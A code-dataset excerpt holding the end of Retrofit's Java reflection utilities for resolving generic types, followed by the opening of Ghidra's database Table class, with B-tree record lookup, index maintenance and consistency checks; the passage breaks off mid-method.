return rawType.getGenericInterfaces()[i];
} else if (toResolve.isAssignableFrom(interfaces[i])) {
return getGenericSupertype(rawType.getGenericInterfaces()[i], interfaces[i], toResolve);
}
}
}
// Check our supertypes.
if (!rawType.isInterface()) {
while (rawType != Object.class) {
Class<?> rawSupertype = rawType.getSuperclass();
if (rawSupertype == toResolve) {
return rawType.getGenericSuperclass();
} else if (toResolve.isAssignableFrom(rawSupertype)) {
return getGenericSupertype(rawType.getGenericSuperclass(), rawSupertype, toResolve);
}
rawType = rawSupertype;
}
}
// We can't resolve this further.
return toResolve;
}
private static int indexOf(Object[] array, Object toFind) {
for (int i = 0; i < array.length; i++) {
if (toFind.equals(array[i])) return i;
}
throw new NoSuchElementException();
}
static String typeToString(Type type) {
return type instanceof Class ? ((Class<?>) type).getName() : type.toString();
}
/**
* Returns the generic form of {@code supertype}. For example, if this is {@code
* ArrayList<String>}, this returns {@code Iterable<String>} given the input {@code
* Iterable.class}.
*
* @param supertype a superclass of, or interface implemented by, this.
*/
static Type getSupertype(Type context, Class<?> contextRawType, Class<?> supertype) {
if (!supertype.isAssignableFrom(contextRawType)) throw new IllegalArgumentException();
return resolve(
context, contextRawType, getGenericSupertype(context, contextRawType, supertype));
}
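// Illustrative sketch (not part of the original source): resolving the parameterized form of a
// supertype. The Holder class and its "list" field are hypothetical; exception handling is omitted.
//
// class Holder { ArrayList<String> list; }
// Type context = Holder.class.getDeclaredField("list").getGenericType(); // ArrayList<String>
// Type iterable = getSupertype(context, ArrayList.class, Iterable.class); // Iterable<String>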
static Type resolve(Type context, Class<?> contextRawType, Type toResolve) {
// This implementation is made a little more complicated in an attempt to avoid object-creation.
while (true) {
if (toResolve instanceof TypeVariable) {
TypeVariable<?> typeVariable = (TypeVariable<?>) toResolve;
toResolve = resolveTypeVariable(context, contextRawType, typeVariable);
if (toResolve == typeVariable) {
return toResolve;
}
} else if (toResolve instanceof Class && ((Class<?>) toResolve).isArray()) {
Class<?> original = (Class<?>) toResolve;
Type componentType = original.getComponentType();
Type newComponentType = resolve(context, contextRawType, componentType);
return componentType == newComponentType
? original
: new GenericArrayTypeImpl(newComponentType);
} else if (toResolve instanceof GenericArrayType) {
GenericArrayType original = (GenericArrayType) toResolve;
Type componentType = original.getGenericComponentType();
Type newComponentType = resolve(context, contextRawType, componentType);
return componentType == newComponentType
? original
: new GenericArrayTypeImpl(newComponentType);
} else if (toResolve instanceof ParameterizedType) {
ParameterizedType original = (ParameterizedType) toResolve;
Type ownerType = original.getOwnerType();
Type newOwnerType = resolve(context, contextRawType, ownerType);
boolean changed = newOwnerType != ownerType;
Type[] args = original.getActualTypeArguments();
for (int t = 0, length = args.length; t < length; t++) {
Type resolvedTypeArgument = resolve(context, contextRawType, args[t]);
if (resolvedTypeArgument != args[t]) {
if (!changed) {
args = args.clone();
changed = true;
}
args[t] = resolvedTypeArgument;
}
}
return changed
? new ParameterizedTypeImpl(newOwnerType, original.getRawType(), args)
: original;
} else if (toResolve instanceof WildcardType) {
WildcardType original = (WildcardType) toResolve;
Type[] originalLowerBound = original.getLowerBounds();
Type[] originalUpperBound = original.getUpperBounds();
if (originalLowerBound.length == 1) {
Type lowerBound = resolve(context, contextRawType, originalLowerBound[0]);
if (lowerBound != originalLowerBound[0]) {
return new WildcardTypeImpl(new Type[] {Object.class}, new Type[] {lowerBound});
}
} else if (originalUpperBound.length == 1) {
Type upperBound = resolve(context, contextRawType, originalUpperBound[0]);
if (upperBound != originalUpperBound[0]) {
return new WildcardTypeImpl(new Type[] {upperBound}, EMPTY_TYPE_ARRAY);
}
}
return original;
} else {
return toResolve;
}
}
}
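// Illustrative sketch (not part of the original source): resolving a type variable declared on a
// generic supertype against a concrete subtype. Repo, UserRepo and User are hypothetical types.
//
// interface Repo<T> { T load(); }
// class UserRepo implements Repo<User> { public User load() { return new User(); } }
// Type returnType = Repo.class.getMethod("load").getGenericReturnType(); // T
// Type resolved = resolve(UserRepo.class, UserRepo.class, returnType);   // User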
private static Type resolveTypeVariable(
Type context, Class<?> contextRawType, TypeVariable<?> unknown) {
Class<?> declaredByRaw = declaringClassOf(unknown);
// We can't reduce this further.
if (declaredByRaw == null) return unknown;
Type declaredBy = getGenericSupertype(context, contextRawType, declaredByRaw);
if (declaredBy instanceof ParameterizedType) {
int index = indexOf(declaredByRaw.getTypeParameters(), unknown);
return ((ParameterizedType) declaredBy).getActualTypeArguments()[index];
}
return unknown;
}
/**
* Returns the declaring class of {@code typeVariable}, or {@code null} if it was not declared by
* a class.
*/
private static @Nullable Class<?> declaringClassOf(TypeVariable<?> typeVariable) {
GenericDeclaration genericDeclaration = typeVariable.getGenericDeclaration();
return genericDeclaration instanceof Class ? (Class<?>) genericDeclaration : null;
}
static void checkNotPrimitive(Type type) {
if (type instanceof Class<?> && ((Class<?>) type).isPrimitive()) {
throw new IllegalArgumentException();
}
}
/** Returns true if {@code annotations} contains an instance of {@code cls}. */
static boolean isAnnotationPresent(Annotation[] annotations, Class<? extends Annotation> cls) {
for (Annotation annotation : annotations) {
if (cls.isInstance(annotation)) {
return true;
}
}
return false;
}
static ResponseBody buffer(final ResponseBody body) throws IOException {
Buffer buffer = new Buffer();
body.source().readAll(buffer);
return ResponseBody.create(body.contentType(), body.contentLength(), buffer);
}
static Type getParameterUpperBound(int index, ParameterizedType type) {
Type[] types = type.getActualTypeArguments();
if (index < 0 || index >= types.length) {
throw new IllegalArgumentException(
"Index " + index + " not in range [0," + types.length + ") for " + type);
}
Type paramType = types[index];
if (paramType instanceof WildcardType) {
return ((WildcardType) paramType).getUpperBounds()[0];
}
return paramType;
}
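// Illustrative sketch (not part of the original source): unwrapping a wildcard type argument. The
// Service interface and its "Call<? extends Response> load()" method are assumptions.
//
// ParameterizedType callType =
//     (ParameterizedType) Service.class.getMethod("load").getGenericReturnType();
// Type bodyType = getParameterUpperBound(0, callType); // Response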
static Type getParameterLowerBound(int index, ParameterizedType type) {
Type paramType = type.getActualTypeArguments()[index];
if (paramType instanceof WildcardType) {
return ((WildcardType) paramType).getLowerBounds()[0];
}
return paramType;
}
static boolean hasUnresolvableType(@Nullable Type type) {
if (type instanceof Class<?>) {
return false;
}
if (type instanceof ParameterizedType) {
ParameterizedType parameterizedType = (ParameterizedType) type;
for (Type typeArgument : parameterizedType.getActualTypeArguments()) {
if (hasUnresolvableType(typeArgument)) {
return true;
}
}
return false;
}
if (type instanceof GenericArrayType) {
return hasUnresolvableType(((GenericArrayType) type).getGenericComponentType());
}
if (type instanceof TypeVariable) {
return true;
}
if (type instanceof WildcardType) {
return true;
}
String className = type == null ? "null" : type.getClass().getName();
throw new IllegalArgumentException(
"Expected a Class, ParameterizedType, or "
+ "GenericArrayType, but <"
+ type
+ "> is of type "
+ className);
}
static final class ParameterizedTypeImpl implements ParameterizedType {
private final @Nullable Type ownerType;
private final Type rawType;
private final Type[] typeArguments;
ParameterizedTypeImpl(@Nullable Type ownerType, Type rawType, Type... typeArguments) {
// Require an owner type if the raw type needs it.
if (rawType instanceof Class<?>
&& (ownerType == null) != (((Class<?>) rawType).getEnclosingClass() == null)) {
throw new IllegalArgumentException();
}
for (Type typeArgument : typeArguments) {
Objects.requireNonNull(typeArgument, "typeArgument == null");
checkNotPrimitive(typeArgument);
}
this.ownerType = ownerType;
this.rawType = rawType;
this.typeArguments = typeArguments.clone();
}
@Override
public Type[] getActualTypeArguments() {
return typeArguments.clone();
}
@Override
public Type getRawType() {
return rawType;
}
@Override
public @Nullable Type getOwnerType() {
return ownerType;
}
@Override
public boolean equals(Object other) {
return other instanceof ParameterizedType && Utils.equals(this, (ParameterizedType) other);
}
@Override
public int hashCode() {
return Arrays.hashCode(typeArguments)
^ rawType.hashCode()
^ (ownerType != null ? ownerType.hashCode() : 0);
}
@Override
public String toString() {
if (typeArguments.length == 0) return typeToString(rawType);
StringBuilder result = new StringBuilder(30 * (typeArguments.length + 1));
result.append(typeToString(rawType));
result.append("<").append(typeToString(typeArguments[0]));
for (int i = 1; i < typeArguments.length; i++) {
result.append(", ").append(typeToString(typeArguments[i]));
}
return result.append(">").toString();
}
}
private static final class GenericArrayTypeImpl implements GenericArrayType {
private final Type componentType;
GenericArrayTypeImpl(Type componentType) {
this.componentType = componentType;
}
@Override
public Type getGenericComponentType() {
return componentType;
}
@Override
public boolean equals(Object o) {
return o instanceof GenericArrayType && Utils.equals(this, (GenericArrayType) o);
}
@Override
public int hashCode() {
return componentType.hashCode();
}
@Override
public String toString() {
return typeToString(componentType) + "[]";
}
}
/**
* The WildcardType interface supports multiple upper bounds and multiple lower bounds. We only
* support what the Java 6 language needs - at most one bound. If a lower bound is set, the upper
* bound must be Object.class.
*/
private static final class WildcardTypeImpl implements WildcardType {
private final Type upperBound;
private final @Nullable Type lowerBound;
WildcardTypeImpl(Type[] upperBounds, Type[] lowerBounds) {
if (lowerBounds.length > 1) throw new IllegalArgumentException();
if (upperBounds.length != 1) throw new IllegalArgumentException();
if (lowerBounds.length == 1) {
if (lowerBounds[0] == null) throw new NullPointerException();
checkNotPrimitive(lowerBounds[0]);
if (upperBounds[0] != Object.class) throw new IllegalArgumentException();
this.lowerBound = lowerBounds[0];
this.upperBound = Object.class;
} else {
if (upperBounds[0] == null) throw new NullPointerException();
checkNotPrimitive(upperBounds[0]);
this.lowerBound = null;
this.upperBound = upperBounds[0];
}
}
@Override
public Type[] getUpperBounds() {
return new Type[] {upperBound};
}
@Override
public Type[] getLowerBounds() {
return lowerBound != null ? new Type[] {lowerBound} : EMPTY_TYPE_ARRAY;
}
@Override
public boolean equals(Object other) {
return other instanceof WildcardType && Utils.equals(this, (WildcardType) other);
}
@Override
public int hashCode() {
// This equals Arrays.hashCode(getLowerBounds()) ^ Arrays.hashCode(getUpperBounds()).
return (lowerBound != null ? 31 + lowerBound.hashCode() : 1) ^ (31 + upperBound.hashCode());
}
@Override
public String toString() {
if (lowerBound != null) return "? super " + typeToString(lowerBound);
if (upperBound == Object.class) return "?";
return "? extends " + typeToString(upperBound);
}
}
// https://github.com/ReactiveX/RxJava/blob/6a44e5d0543a48f1c378dc833a155f3f71333bc2/
// src/main/java/io/reactivex/exceptions/Exceptions.java#L66
static void throwIfFatal(Throwable t) {
if (t instanceof VirtualMachineError) {
throw (VirtualMachineError) t;
} else if (t instanceof ThreadDeath) {
throw (ThreadDeath) t;
} else if (t instanceof LinkageError) {
throw (LinkageError) t;
}
}
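// Illustrative sketch (not part of the original source): letting fatal JVM errors propagate while
// containing anything else thrown by user code. "callback", "call" and "response" are assumed names.
//
// try {
//     callback.onResponse(call, response);
// } catch (Throwable t) {
//     throwIfFatal(t);     // rethrows VirtualMachineError, ThreadDeath and LinkageError
//     t.printStackTrace(); // any other failure is reported instead of propagated
// }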
/** Not volatile because we don't mind multiple threads discovering this. */
private static boolean checkForKotlinUnit = true;
static boolean isUnit(Type type) {
if (checkForKotlinUnit) {
try {
return type == Unit.class;
} catch (NoClassDefFoundError ignored) {
checkForKotlinUnit = false;
}
}
return false;
}
}
| square/retrofit | retrofit/src/main/java/retrofit2/Utils.java |
1,117 | /* ###
* IP: GHIDRA
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package db;
import java.io.IOException;
import java.util.*;
import db.Field.UnsupportedFieldException;
import ghidra.util.Msg;
import ghidra.util.datastruct.IntObjectHashtable;
import ghidra.util.exception.*;
import ghidra.util.task.TaskMonitor;
/**
* Table implementation class.
* NOTE: Most public methods are synchronized on the associated DBHandle instance
* to prevent concurrent modification by multiple threads.
*/
public class Table {
private DBHandle db;
private TableRecord tableRecord;
private Schema schema;
private NodeMgr nodeMgr;
private int rootBufferId = -1;
private int recordCount;
private long maximumKey;
private IntObjectHashtable<IndexTable> secondaryIndexes = new IntObjectHashtable<>();
private int[] indexedColumns = new int[0];
private boolean isIndexed = false;
/**
* Modification counter
*/
int modCount = 0;
/**
* Construct a new or existing Table.
* @param db database handle
* @param tableRecord master table record for this table.
* @throws UnsupportedFieldException if unsupported schema field encountered
*/
Table(DBHandle db, TableRecord tableRecord) throws UnsupportedFieldException {
this.db = db;
this.tableRecord = tableRecord;
schema = tableRecord.getSchema();
tableRecord.setTable(this);
rootBufferId = tableRecord.getRootBufferId();
recordCount = tableRecord.getRecordCount();
maximumKey = tableRecord.getMaxKey();
nodeMgr = new NodeMgr(this, db.getBufferMgr());
}
/**
* @return the database handle used by this table.
*/
DBHandle getDBHandle() {
return db;
}
/**
* Determine if this table uses long keys.
* @return true if this table utilizes long keys.
*/
public boolean useLongKeys() {
return schema.useLongKeyNodes();
}
/**
* Determine if this table uses FixedField keys.
* @return true if this table utilizes FixedField keys.
*/
public boolean useFixedKeys() {
return schema.useFixedKeyNodes();
}
/**
* Callback notification indicating that the tableRecord has been
* changed by the masterTable. This method is called via the MasterTable
* following an undo or redo.
*/
void tableRecordChanged() {
rootBufferId = tableRecord.getRootBufferId();
recordCount = tableRecord.getRecordCount();
maximumKey = tableRecord.getMaxKey();
++modCount;
}
/**
* Mark table as invalid.
* Subsequent table use may generate an exception.
*/
void invalidate() {
tableRecord = null;
rootBufferId = -1;
nodeMgr = null;
++modCount;
}
/**
* Get this table's master table number.
* @return table number for this table. Each table has a unique table
* number within the master table.
*/
long getTableNum() {
return tableRecord.getTableNum();
}
/**
* Get table statistics.
* @return list of diagnostic statistics data for this table and related index tables.
* @throws IOException database IO error
*/
public TableStatistics[] getAllStatistics() throws IOException {
TableStatistics[] statList = new TableStatistics[indexedColumns.length + 1];
statList[0] = getStatistics();
for (int i = 0; i < indexedColumns.length; i++) {
IndexTable indexTable = secondaryIndexes.get(indexedColumns[i]);
statList[i + 1] = indexTable.getStatistics();
}
return statList;
}
private BTreeNode getBTreeNode(int bufferId) throws IOException {
if (schema.useLongKeyNodes()) {
return nodeMgr.getLongKeyNode(bufferId);
}
if (schema.useFixedKeyNodes()) {
return nodeMgr.getFixedKeyNode(bufferId);
}
return nodeMgr.getVarKeyNode(bufferId);
}
/**
* Get node identified by buffer - must be released by caller (requires DBHandle lock)
* @param bufferId buffer ID
* @return buffer node
* @throws IOException if IO error occurs
*/
private FieldKeyNode getFieldKeyNode(int bufferId) throws IOException {
if (schema.useFixedKeyNodes()) {
return nodeMgr.getFixedKeyNode(bufferId);
}
return nodeMgr.getVarKeyNode(bufferId);
}
/**
* Accumulate node statistics (requires DBHandle lock)
* @param stats statistics collection object
* @param bufferId node buffer ID to examine
* @throws IOException thrown if IO error occurs
*/
private void accumulateNodeStatistics(TableStatistics stats, int bufferId) throws IOException {
if (bufferId < 0) {
return;
}
BTreeNode node = getBTreeNode(bufferId);
++stats.bufferCount;
int[] ids = node.getBufferReferences();
if (node instanceof InteriorNode) {
++stats.interiorNodeCnt;
for (int id : ids) {
accumulateNodeStatistics(stats, id);
}
}
else {
++stats.recordNodeCnt;
for (int id : ids) {
ChainedBuffer dbBuf = new ChainedBuffer(nodeMgr.getBufferMgr(), id);
int cnt = dbBuf.getBufferCount();
stats.chainedBufferCnt += cnt;
stats.bufferCount += cnt;
}
}
nodeMgr.releaseNodes(); // no need to hang on to buffers
}
/**
* Compile table statistics.
* @return table statistics data
* @throws IOException thrown if an IO error occurs
*/
public TableStatistics getStatistics() throws IOException {
synchronized (db) {
TableStatistics stats = new TableStatistics();
stats.name = getName();
try {
accumulateNodeStatistics(stats, rootBufferId);
stats.size = stats.bufferCount * nodeMgr.getBufferMgr().getBufferSize();
}
finally {
nodeMgr.releaseNodes();
}
return stats;
}
}
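// Illustrative usage sketch (not part of the original source): reporting the buffer footprint of a
// table; TableStatistics exposes its counters as fields accessible within this package.
//
// TableStatistics stats = table.getStatistics();
// Msg.info(table, stats.name + ": " + stats.bufferCount + " buffers, " + stats.size + " bytes");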
/**
* Add an existing secondary index.
* NOTE: Records for this table instance must not be modified until
* after all existing secondary indexes are added. Failure to comply may
* result in an inconsistent index.
* @param indexTable secondary index table
*/
void addIndex(IndexTable indexTable) {
secondaryIndexes.put(indexTable.getColumnIndex(), indexTable);
indexedColumns = secondaryIndexes.getKeys();
isIndexed = true;
}
/**
* Callback method for when a new record is added.
* Used for maintaining indexes only. May be called before
* the new record is actually inserted.
* @param record new record which has been added
* @throws IOException thrown if IO error occurs
*/
void insertedRecord(DBRecord record) throws IOException {
// Add secondary index entries for new record
for (int indexedColumn : indexedColumns) {
IndexTable indexTable = secondaryIndexes.get(indexedColumn);
indexTable.addEntry(record);
}
}
/**
* Callback method for when an existing record is modified.
* Used for maintaining indexes only. May be called before
* the old record is actually updated.
* @param oldRecord old record
* @param newRecord new record
* @throws IOException thrown if IO error occurs
*/
void updatedRecord(DBRecord oldRecord, DBRecord newRecord) throws IOException {
// Update secondary indexes which have been affected
for (int colIx : indexedColumns) {
Field oldField = oldRecord.getField(colIx);
Field newField = newRecord.getField(colIx);
if (!oldField.equals(newField)) {
IndexTable indexTable = secondaryIndexes.get(colIx);
indexTable.deleteEntry(oldRecord);
indexTable.addEntry(newRecord);
}
}
}
/**
* Callback method for when existing records are deleted.
* Used for maintaining indexes only. May be called before
* the old record is actually deleted.
* @param oldRecord record which has been deleted
* @throws IOException thrown if IO error occurs
*/
void deletedRecord(DBRecord oldRecord) throws IOException {
// Delete secondary index entries
for (int indexedColumn : indexedColumns) {
IndexTable indexTable = secondaryIndexes.get(indexedColumn);
indexTable.deleteEntry(oldRecord);
}
}
/**
* Rebuild table and associated indexes to ensure consistent state.
* @param monitor task monitor
* @throws IOException if unable to rebuild
* @throws CancelledException if task was cancelled
*/
public void rebuild(TaskMonitor monitor) throws IOException, CancelledException {
synchronized (db) {
db.checkTransaction();
if (rootBufferId < 0) {
return;
}
try {
BTreeNode rootNode = getBTreeNode(rootBufferId);
if (!rootNode.isConsistent(getName(), monitor)) {
throw new IOException("Low level tree consistency error (" + getName() +
"): Unable to rebuild database");
}
}
catch (IOException t) {
throw new IOException("Low level tree consistency error (" + getName() +
"): failed to fetch root buffer: " + t.getMessage());
}
finally {
nodeMgr.releaseNodes();
}
// Rebuild table indexes
try {
// Remove all index records
for (int indexedColumn : indexedColumns) {
IndexTable indexTable = secondaryIndexes.get(indexedColumn);
monitor.setMessage("Clear Index Table " + getName() + "." +
schema.getFieldNames()[indexTable.getColumnIndex()]);
indexTable.indexTable.deleteAll();
}
}
finally {
nodeMgr.releaseNodes();
}
// Determine actual record count, max-key value and rebuild indexes
monitor.setMessage("Rebuild Table " + getName());
int actualCount = 0;
LongField maxKey = null;
try {
RecordIterator recIter = iterator();
while (recIter.hasNext()) {
DBRecord rec = recIter.next();
++actualCount;
Field keyField = rec.getKeyField();
if ((keyField instanceof LongField) &&
(maxKey == null || maxKey.compareTo(rec.getKeyField()) < 0)) { // track the largest key seen
maxKey = (LongField) keyField;
}
insertedRecord(rec);
}
}
finally {
nodeMgr.releaseNodes();
}
if (maxKey != null && maxKey.getLongValue() > tableRecord.getMaxKey()) {
tableRecord.setMaxKey(maxKey.getLongValue());
}
tableRecord.setRecordCount(actualCount);
if (!isConsistent(monitor)) {
throw new IOException(
"Consistency check failed after rebuilding table " + getName());
}
}
}
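// Illustrative usage sketch (not part of the original source): verifying a table before relying on
// it; rebuild() must be invoked within an open transaction. TaskMonitor.DUMMY (or an equivalent
// no-op monitor) is assumed to be acceptable here.
//
// if (!table.isConsistent(TaskMonitor.DUMMY)) {
//     table.rebuild(TaskMonitor.DUMMY);
// }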
/**
* Check the consistency of this table and its associated index tables.
* @param monitor task monitor
* @return true if consistency check passed, else false
* @throws IOException thrown if IO error occurs
* @throws CancelledException if task was cancelled
*/
public boolean isConsistent(TaskMonitor monitor) throws IOException, CancelledException {
return isConsistent(null, monitor);
}
boolean isConsistent(String indexName, TaskMonitor monitor)
throws IOException, CancelledException {
synchronized (db) {
if (rootBufferId < 0) {
return true;
}
monitor.setMessage("Check Table " + getName());
boolean consistent;
try {
BTreeNode rootNode = getBTreeNode(rootBufferId);
consistent = rootNode.isConsistent(getName(), monitor);
}
catch (IOException t) {
Msg.debug(this, "Consistency Error (" + getName() +
"): failed to fetch root buffer: " + t.getMessage());
return false;
}
finally {
nodeMgr.releaseNodes();
}
// Check consistency of index tables
for (int indexedColumn : indexedColumns) {
IndexTable indexTable = secondaryIndexes.get(indexedColumn);
monitor.setMessage("Check Table " + getName() + "." +
schema.getFieldNames()[indexTable.getColumnIndex()]);
consistent &= indexTable.isConsistent(monitor);
}
HashMap<Integer, Integer> missingIndexRecMap = new HashMap<>();
int actualCount = 0;
RecordIterator recIter = iterator();
while (recIter.hasNext()) {
DBRecord rec = recIter.next();
++actualCount;
// Check for bad index tables (missing or invalid entries)
for (int indexedColumn : indexedColumns) {
IndexTable indexTable = secondaryIndexes.get(indexedColumn);
Field f = rec.getField(indexedColumn);
if (indexTable.isSparseIndex && f.isNull()) {
continue; // skip unindexed field
}
boolean found = false;
Field[] keys = indexTable.findPrimaryKeys(f);
for (Field key : keys) {
if (key.equals(rec.getKeyField())) {
found = true;
break;
}
}
if (!found) {
consistent = false;
Integer missing = missingIndexRecMap.get(indexTable.getColumnIndex());
if (missing == null) {
missingIndexRecMap.put(indexTable.getColumnIndex(), 1);
}
else {
missingIndexRecMap.put(indexTable.getColumnIndex(), missing + 1);
}
logIndexConsistencyError(
schema.getFieldNames()[indexTable.getColumnIndex()],
"Index table does not reference record key: " +
rec.getKeyField().getValueAsString());
}
}
}
if (actualCount != getRecordCount()) {
consistent = false;
logIndexConsistencyError(indexName,
"Table record count inconsistent: iterator-count=" + actualCount +
" stored-count=" + getRecordCount());
}
for (int indexCol : missingIndexRecMap.keySet()) {
int missing = missingIndexRecMap.get(indexCol);
logIndexConsistencyError(schema.getFieldNames()[indexCol],
"Index is missing " + missing + " record references");
}
// Check for bad index tables (missing or invalid entries)
for (int indexedColumn : indexedColumns) {
IndexTable indexTable = secondaryIndexes.get(indexedColumn);
monitor.setMessage("Check Index " + getName() + "." +
schema.getFieldNames()[indexTable.getColumnIndex()]);
HashSet<Field> keySet = new HashSet<>();
int extra = 0;
DBFieldIterator keyIterator = indexTable.keyIterator();
while (keyIterator.hasNext()) {
Field key = keyIterator.next();
if (getRecord(key) == null) {
++extra;
}
if (!keySet.add(key)) {
logIndexConsistencyError(
schema.getFieldNames()[indexTable.getColumnIndex()],
"Index table references duplicate key: " + key.getValueAsString());
}
}
if (extra != 0) {
consistent = false;
logIndexConsistencyError(schema.getFieldNames()[indexTable.getColumnIndex()],
"Index table references " + extra + " nonexistent record keys");
}
}
return consistent;
}
}
void logIndexConsistencyError(String indexName, String msg) {
Msg.debug(this, "Index Consistency Error (" + getName() +
(indexName != null ? ("." + indexName) : "") + "): " + msg);
}
/**
* Delete all records within this table.
* @throws IOException if IO error occurs
*/
public void deleteAll() throws IOException {
synchronized (db) {
db.checkTransaction();
if (rootBufferId < 0) {
return;
}
try {
BTreeNode rootNode = getBTreeNode(rootBufferId);
try {
// Delete all records
rootNode.delete();
// Delete all index entries
for (int indexedColumn : indexedColumns) {
IndexTable indexTable = secondaryIndexes.get(indexedColumn);
indexTable.deleteAll();
}
}
finally {
tableRecord.setRootBufferId(rootBufferId = -1);
tableRecord.setRecordCount(recordCount = 0);
tableRecord.setMaxKey(maximumKey = Long.MIN_VALUE);
}
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the list of columns which are indexed
* @return list of indexed columns
*/
public int[] getIndexedColumns() {
return indexedColumns;
}
/**
* Remove the index associated with the specified column.
* @param columnIndex column corresponding to the column index which
* should be deleted.
* @throws IOException thrown if IO error occurs
*/
void removeIndex(int columnIndex) throws IOException {
IndexTable indexTable = secondaryIndexes.get(columnIndex);
if (indexTable != null) {
indexTable.deleteAll();
db.getMasterTable().deleteTableRecord(indexTable.getTableNum());
secondaryIndexes.remove(columnIndex);
indexedColumns = secondaryIndexes.getKeys();
}
}
/**
* Get this table's schema.
* @return table schema
*/
public Schema getSchema() {
return schema;
}
/**
* Get table name
* @return table name
*/
public String getName() {
return tableRecord.getName();
}
/**
* Change the name of this table
* @param name new table name
* @return true if rename successful
* @throws DuplicateNameException if new table name already exists
*/
public boolean setName(String name) throws DuplicateNameException {
return db.setTableName(getName(), name);
}
/**
* Get record count
* @return record count
*/
public int getRecordCount() {
return (tableRecord == null ? 0 : tableRecord.getRecordCount());
}
/**
* Get the maximum record key which has ever been assigned within this table.
* This method is only valid for those tables which employ a long key and may
* not reflect records which have been removed (i.e., returned key may not
* correspond to an existing record).
* @return maximum record key.
*/
public long getMaxKey() {
return tableRecord.getMaxKey();
}
/**
* Get the next available key.
* This method is only valid for those tables which employ a long key.
* @return next available key.
*/
public long getKey() {
long key = getMaxKey();
if (key == Long.MIN_VALUE) {
return 0;
}
return key + 1;
}
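// Illustrative usage sketch (not part of the original source): allocating the next long key and
// storing a new record. NAME_COL is a hypothetical string column index and an open transaction is
// assumed.
//
// DBRecord rec = table.getSchema().createRecord(table.getKey());
// rec.setString(NAME_COL, "example");
// table.putRecord(rec);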
// /**
// * Sets the current root node for this table.
// * If the root changes the master table must be updated.
// * @param rootNode
// */
// private void setRootNode(LongKeyNode rootNode) {
// int id = rootNode.getBufferId();
// if (rootBufferId != id) {
// tableRecord.setRootBufferId(id);
// rootBufferId = id;
// }
// }
//
// /**
// * Sets the current root node for this table.
// * If the root changes the master table must be updated.
// * @param rootNode
// */
// private void setRootNode(VarKeyNode rootNode) {
// int id = rootNode.getBufferId();
// if (rootBufferId != id) {
// tableRecord.setRootBufferId(id);
// rootBufferId = id;
// }
// }
/**
* Determine if this table contains a record with the specified key.
* @param key record key.
* @return true if record exists with key, else false.
* @throws IOException thrown if IO error occurs
*/
public boolean hasRecord(long key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return false;
}
boolean result = false;
try {
LongKeyRecordNode leaf = nodeMgr.getLongKeyNode(rootBufferId).getLeafNode(key);
result = leaf.getKeyIndex(key) >= 0;
}
finally {
nodeMgr.releaseNodes();
}
return result;
}
}
/**
* Determine if this table contains a record with the specified key.
* @param key record key.
* @return true if record exists with key, else false.
* @throws IOException thrown if an IO error occurs
*/
public boolean hasRecord(Field key) throws IOException {
synchronized (db) {
if (schema.useLongKeyNodes()) {
return hasRecord(key.getLongValue());
}
if (rootBufferId < 0) {
return false;
}
boolean result = false;
try {
FieldKeyRecordNode leaf = getFieldKeyNode(rootBufferId).getLeafNode(key);
result = leaf.getKeyIndex(key) >= 0;
}
finally {
nodeMgr.releaseNodes();
}
return result;
}
}
/**
* Get the record identified by the specified key value.
* @param key unique record key.
* @return Record the record identified by key, or null if record was not
* found.
* @throws IOException thrown if an IO error occurs
*/
public DBRecord getRecord(long key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
try {
LongKeyRecordNode leaf = nodeMgr.getLongKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecord(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record identified by the specified key value.
* @param key unique record key.
* @return Record the record identified by key, or null if record was not
* found.
* @throws IOException thrown if an IO error occurs
*/
public DBRecord getRecord(Field key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
if (key instanceof LongField) {
return getRecord(key.getLongValue());
}
FieldKeyRecordNode leaf;
try {
if (key instanceof FixedField) {
leaf = nodeMgr.getFixedKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecord(key, schema);
}
leaf = getFieldKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecord(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the maximum key value which is less than
* the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value less than the
* specified key, or null if no record was found.
* @throws IOException thrown if an IO error occurs
*/
public DBRecord getRecordBefore(long key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
try {
LongKeyRecordNode leaf = nodeMgr.getLongKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecordBefore(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the maximum key value which is less than
* the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value less than the
* specified key, or null if no record was found.
* @throws IOException thrown if an IO error occurs
*/
public DBRecord getRecordBefore(Field key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
if (key instanceof LongField) {
return getRecordBefore(key.getLongValue());
}
try {
FieldKeyRecordNode leaf = getFieldKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecordBefore(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the minimum key value which is greater than
* the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value greater than the
* specified key, or null if no record was found.
* @throws IOException thrown if an IO error occurs
*/
public DBRecord getRecordAfter(long key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
try {
LongKeyRecordNode leaf = nodeMgr.getLongKeyNode(rootBufferId).getLeafNode(key);
return leaf.getRecordAfter(key, schema);
}
finally {
nodeMgr.releaseNodes();
}
}
}
/**
* Get the record with the minimum key value which is greater than
* the specified key.
* @param key unique key which may or may not exist within the table.
* @return the first record which has a key value greater than the
* specified key, or null if no record was found.
* @throws IOException thrown if an IO error occurs
*/
public DBRecord getRecordAfter(Field key) throws IOException {
synchronized (db) {
if (rootBufferId < 0) {
return null;
}
if (key instanceof LongField) {
return getRecordAfter(key.getLongValue());
}
try {
FieldKeyRecordNode leaf = getFieldKeyNode(rootBufferId).getLeafNode(key);
